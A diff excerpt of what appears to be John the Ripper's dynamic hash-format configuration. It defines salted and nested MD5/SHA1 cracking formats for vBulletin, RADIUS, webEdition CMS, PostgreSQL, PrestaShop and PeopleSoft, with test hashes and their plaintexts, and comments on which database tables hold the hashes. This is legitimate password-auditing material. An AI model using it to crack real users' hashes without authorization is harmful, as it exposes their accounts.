+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1005$784c527d0d92873ff9c0773e1c35621d:test1
+Test=$dynamic_1005$efcbbe6331caecf0e7f40160e65aadcc:thatsworking
+Test=$dynamic_1005$abb8bdd2c6ac2dfea2b2af6f5aed5446:test3
+TestM=$dynamic_1005$8f853f8abf74a8e686c213a9849d9beb:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1005$37e4fc15b5dc59286aee85f4b7008315:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^8  (i.e. 8 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1006]
+# expression shown will be the string:   dynamic_1006 md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Expression=md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 8 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1006$1ec1f32398f64cab51183f63630eceea:test1
+Test=$dynamic_1006$f66b339ac21d6fd6af216f2b70aab2c9:thatsworking
+Test=$dynamic_1006$e9d38522b5eeec753332e576e2e0fe5d:test3
+TestM=$dynamic_1006$399310c857c0d83b931441d514528ee6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1006$e89d92a2291b5b43b6697c51d722ae8b:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for vBulletin md5(md5($p).$s)   Included here to 'exercise' the script parser
+####################################################################
+[List.Generic:dynamic_1007]
+# expression shown will be the string:   dynamic_1007 md5(md5($p).$s) [vBulletin]
+Expression=md5(md5($p).$s) (vBulletin)
+# Flag needed here, is Salt.  There is no 'fixed' saltlen.
+Flag=MGF_SALTED
+Flag=MGF_KEYS_BASE16_IN1
+# vBulletin has a 'fixed' 3 byte salt, so list the fixed size  (restriction removed).
+SaltLen=-23
+SaltLenX86=-64
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform vBulletin hash
+Func=DynamicFunc__set_input_len_32_cleartop
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1007$daa61d77e218e42060c2fa198ac1feaf$SXB:test1
+Test=$dynamic_1007$de56b00bb15d6db79204bd44383469bc$T &:thatsworking
+Test=$dynamic_1007$fb685c6f469f6e549c85e4c1fb5a65a6$HEX$5C483A:test3
+Test=$dynamic_1007$5dd8145e0d1e2499bce05dcb4bce5cdf$HEX$24324F:testme
+TestM=$dynamic_1007$09019afd1303ff078ba323569ac05ea5$123:1234567890123456789012345678901234567890123456789012
+TestF=$dynamic_1007$1eff62d90df7e82566f75f7cfb316f6e$PS9:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Dynamic type for algorithm used in RADIUS User-Password attribute md5($p.$s)
+####################################################################
+[List.Generic:dynamic_1008]
+# expression shown will be this string:
+Expression=md5($p.$s) (RADIUS User-Password)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+# The salt has a fixed length of 16 bytes
+Saltlen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+# unfortunately, these next 2 have embedded NULLs, so at this time they have been removed.
+# later we will get dynamic working with these also.
+#Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
+#Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
+TestM=$dynamic_1008$6bf84723242c758538951ebfcbe82498$Zm8EXfUeRrEJMx5b:123456789012345678901234567890123456789
+TestF=$dynamic_1008$7978620b9b48b1d6e322bfe5b081bf3e$yH9RErqH2ktDYesl:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
+#
+# Also used by a "popular" backup solution
+# select id, name, emailid, password from administrator;
+# hashlib.md5((str(id) + pwd)).hexdigest()
+######################################################################
+[List.Generic:dynamic_1009]
+Expression=md5($s.$p) (RADIUS Responses)
+Flag=MGF_SALTED
+Saltlen=-16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1
+Test=$dynamic_1009$05ed3fc5e044d559290c400254e568c9$1:hackme
+TestM=$dynamic_1009$9619094908f5c9f29eb95eadefae84c3$ex5fKtjhZwVMCi2C:123456789012345678901234567890123456789
+TestF=$dynamic_1009$92cfbd6aadc48b2ef97ca2699037dea6$73WkPYCT2CxnQ8pt:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RAdmin v2.x Responses md5($p.NULL-to-100-bytes)
+# v2, where keys are in input, and set_input_len_100 'cleans' up if needed.
+######################################################################
+[List.Generic:dynamic_1010]
+Expression=md5($p null_padded_to_len_100) RAdmin v2.x MD5
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Func=DynamicFunc__set_input_len_100
+##JF Func=DynamicFunc__crypt_md5
+
+# MUCH faster.  Went from 1930k to 5600k
+MaxInputLen=99
+MaxInputLenX86=99
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_POOR_OMP
+Func=DynamicFunc__set_input_len_100
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+Test=$dynamic_1010$B137F09CF92F465CABCA06AB1B283C1F:lastwolf
+Test=$dynamic_1010$14e897b1a9354f875df51047bb1a0765:podebradka
+Test=$dynamic_1010$02ba5e187e2589be6f80da0046aa7e3c:12345678
+Test=$dynamic_1010$b4e13c7149ebde51e510959f30319ac7:firebaLL
+Test=$dynamic_1010$3d2c8cae4621edf8abb081408569482b:yamaha12345
+Test=$dynamic_1010$60cb8e411b02c10ecc3c98e29e830de8:xplicit
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+####################################################################
+[List.Generic:dynamic_1011]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+SaltLen=-55
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1011$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1011$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1011$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1011$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1011$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+# Twice as fast as dynamic_1011 since md5($s) is pre-computed!
+####################################################################
+[List.Generic:dynamic_1012]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+MaxInputLenX86=48
+SaltLen=-110
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1012$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1012$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1012$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1012$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1012$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+## DYNAMIC type for webEdition CMS md5($p.PMD5(username))
+## > select md5(username),passwd,UseSalt from tblUser
+## PMD5(username), pre-computed md5 of username is salt
+#####################################################################
+[List.Generic:dynamic_1013]
+Expression=md5($p.PMD5(username)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+MaxInputLen=23
+SaltLen=32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1013$14f8b3781f19a3b7ea520311482ce207$f2df0ddd3129c68b1ae7be05779ebeb3:openwall
+TestM=$dynamic_1013$b8db62204359efcbfc92da2d697d21cb$f3ae4d2b2c3600df57bbeab163eac04b:12345678901234567890123
+TestF=$dynamic_1013$61f55f04f8f4e05392415181bcf57420$5e87dbf3663cbead467fc645c5c9586d:123456789012345678901234567890123456789012345678
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+####################################################################
+[List.Generic:dynamic_1014]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+##JF Went from 1376k/1100k to 3483k/2600k by switching to flat buffer sse2
+##JF Flag=MGF_NOTSSE2Safe
+Flag=MGF_FLAT_BUFFERS
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+##JF MaxInputLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+##JF Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1014$c0dbfba522fad4054da9808a2fa09580$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:test
+Test=$dynamic_1014$6130b0e84d387ffd460fc83cffcc1426$bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbc:aaaa
+Test=$dynamic_1014$399df23011bb3742e83011c1074187e2$cccccccccccccccccccccccccccccccccccccccccccccccccccd:bbbb
+Test=$dynamic_1014$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1014$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1014$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+Test=$dynamic_1014$e463b65f14643afd970c7ea7e7efeb0f$123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890:12345678901234567890123456789012
+
+####################################################################
+# Dynamic type for md5(md5($p.$u).$s) for PostgreSQL 'pass the hash' weakness
+# See also dynamic_1034 for PostgreSQL MD5
+# http://www.openwall.com/lists/oss-security/2015/03/03/12
+####################################################################
+[List.Generic:dynamic_1015]
+Expression=md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+Flag=MGF_SALTED
+Flag=MGF_USERNAME
+MaxInputLen=31
+MaxInputLenX86=56
+SaltLen=-23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d:openwall:postgres
+Test=$dynamic_1015$1c4e11fb51835c3bbe9851ec91ec1375$HEX$c31803a2:password:postgres
+Test=$dynamic_1015$bf2a64f35feba7bf1b633d60393c1356$HEX$684697c8:openwall:postgres
+# repeat one test in the format that is used in john.pot
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d242455706f737467726573:openwall
+TestM=$dynamic_1015$c99b3494687ed9895d4ffca184a9daf5$M6krNt:1234567890123456789012345678901:usrx
+TestF=$dynamic_1015$5618a66e934dfef13cae2d06d71bdf75$usrwxT:12345678901234567890123456789012345678901234567890123456:01234
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+#  NOTE, we should use dynamic_2001 and not this hash.
+####################################################################
+[List.Generic:dynamic_1016]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$e30003fa000100000001000000000000000000000000000000000000000000000000000000000000d7dd1060ee06bec2:secret
+# repeat that hash in exactly the same form that is used in john.pot
+#Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$48455824653330303033666130303031303030303030303130303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303064376464313036306565303662656332:secret
+
+####################################################################
+# Dynamic type for md5($s.$p) for long salts
+#  NOTE, we should use dynamic_2004 and not this hash.
+####################################################################
+[List.Generic:dynamic_1017]
+# expression shown will be this string:
+Expression=md5($s.$p) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=55
+MaxInputLen=55
+SaltLen=-192
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+# PrestaShop uses long salts, $s == _COOKIE_KEY_ (config/settings.inc.php file)
+# PrestaShop hashes can be extracted from the "ps_employee" table ("ps_" is the default table prefix)
+# PrestaShop 1.6.0.9 was used for testing this!
+# Update: PrestaShop 1.7.x.y doesn't make use of the config/settings.inc.php
+# file. It uses bcrypt hashing, and the hashes are stored in the ps_customer
+# table.
+#
+# This hash format is also used by RADIUS Responses when salts are > 16 bytes long.
+Test=$dynamic_1017$2b3f4811983db00560dfd4c28f67bc5a$B3DdR7ZVi2N26aVbR84bjSAHht8JYhqcDr1FK49jiQXFU8Vo66PKmAFt:lemons12345
+
+[List.Generic:dynamic_1018]
+Expression=md5(sha1(sha1($p)))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1018$a93dcf04edd0e2b98c1165304c250b80:1234abcd
+Test=$dynamic_1018$f3b5f01810c4d66ae0af85b3789e12cd:potato
+TestM=$dynamic_1018$5c43d21a3dfb81435d45e78334fa6109:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1018$073c8ec8e73fdedb7aad9df4ded29ba3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1019]
+Expression=md5(sha1(sha1(md5($p))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1019$86f607194f0aefe63a6c13723e94382d:jjaammaaiiccaa
+Test=$dynamic_1019$77faf9282c0c9b5870a4d9c3ec484aca:blink182
+TestM=$dynamic_1019$bc679e2715c335fcf8b9205efd031521:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1019$36966d66615d3c0de89ca53ed88212ec:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1020]
+Expression=md5(sha1(md5($p)))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1020$2a8ce40b837c8550506d9b5d220bac28:0124
+TestM=$dynamic_1020$74102b324b8b1cf909263284a53955aa:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1020$e4ad9c1e34bad775d2cd399294c286e8:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1021]
+Expression=md5(sha1(md5(sha1($p))))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1021$c1e054140feac1b411d3efc8bae5b881:norway
+TestM=$dynamic_1021$dbf8fc7a96898e16e1251d94b3bb06d9:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1021$df38670077cb4c299bcaf06e8271c986:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1022]
+Expression=md5(sha1(md5(sha1(md5($p)))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1022$9caf8c249c588a89030db581ec6cea47:313131
+Test=$dynamic_1022$e1eb34c6ab9e9cbe4ff67fdeb747e169:8616
+TestM=$dynamic_1022$d4d51c756abefb41bafbcff7c6237618:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1022$9367b878de004be863000174e728c15f:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1023]
+Expression=sha1($p) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1023$5baa61e4c9b93f3f0682250b6cf8331b:password
+Test=$dynamic_1023$e4227954acdafb57977d7dc8a1957095:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1024]
+Expression=sha1(md5($p)) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1024$c56289182ffd862d906eac1ce5c6fe6d:trigun
+TestM=$dynamic_1024$e290c79e9584e4cd61faded848ff96f0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1024$609fed73c093edfbcc9913004656f360:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1025]
+Expression=sha1(md5(md5($p))) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1025$f122db007ed655921f98184e4302bba8:123456
+TestM=$dynamic_1025$006d246968ee9e761578bce26d5a82a2:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1025$cc98637054045e998ab01e97ce65585e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1026]
+Expression=sha1(sha1($p)) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1026$71b37a2d9b0a7d5dc4da8a08d9092817:peanuts
+Test=$dynamic_1026$30f8cf133eaac8e3b6af4bcba722921d:peanut
+Test=$dynamic_1026$809df50e02b68a389a8f6639a03421eb:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1027]
+Expression=sha1(sha1(sha1($p))) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1027$b8443c12b3066dac22b3857b2fb779b4:leelee
+Test=$dynamic_1027$00aeb6dc5e6269a6b2f39728cd8a6812:test1
+Test=$dynamic_1027$54e45916fb79f7be1c695828fdba4491:test3
+Test=$dynamic_1027$d08a9796dc4ea6decf59ce43caa1b4b4:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1028]
+Expression=sha1(sha1_raw($p)) (hash truncated to length 32)
+# currently, the raw sha1 does not work in SSE code.  It does work on 'flat' x86 code
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1028$79239e0207cd5f6a472c8795c73b451d:rainbow
+Test=$dynamic_1028$06c0bf5b64ece2f648b5f048a7190390:test1
+Test=$dynamic_1028$f357e78cabad76fd3f1018ef85d78499:test3
+Test=$dynamic_1028$64ad70ca481a2c33a2c843cc03555365:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1029]
+Expression=sha256($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1029$e4ad93ca07acb8d908a3aa41e920ea4f:iloveyou
+Test=$dynamic_1029$13b1f7ec5beaefc781e43a3b344371cd:freedom
+Test=$dynamic_1029$aa97302150fce811425cd84537028a5a:computer
+Test=$dynamic_1029$75ff6bea5b0ad25171988e435c24b3ee:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1030]
+Expression=whirlpool($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__WHIRLPOOL_crypt_input1_to_output1_FINAL
+Test=$dynamic_1030$56fd4ecb153a08b65a73b51e3c8ca369:spiral
+Test=$dynamic_1030$6b116ef0c32185d3ae1136f4593a5cae:defender
+Test=$dynamic_1030$fee8605795f28dda386324d59a28ba99:amazon
+Test=$dynamic_1030$73622582350099f45647970c0a8a2496:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1031]
+Expression=gost($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__GOST_crypt_input1_to_output1_FINAL
+Test=$dynamic_1031$0e8cd409a23c2e7ad1c5b22b101dfa16:admin
+Test=$dynamic_1031$3b024be97641061bdd5409b4866c26c5:test1
+Test=$dynamic_1031$55719211936152fbe2e1f6aa796fa866:test3
+Test=$dynamic_1031$096dd6ff632727d682070752fbda548e:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1032]
+Expression=sha1_64(utf16($p)) (PeopleSoft)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_UTF8
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1032$6Pl/upEE0epQR5SObftn+s2fW3M=:password
+
+[List.Generic:dynamic_1033]
+Expression=sha1_64(utf16($p).$s)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-32
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__setmode_normal
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+# we want to make SURE that something ending with = mixed
+# with others NOT ending with = are handled properly.
+Test=$dynamic_1033$D7C1gHanUq1xE96HpEQitzAhNB8$FyKXs6zU:password
+Test=$dynamic_1033$sh+Q50Cp4vERzDkJcaaKIv8zubM=$M1RxMCTZ:password2
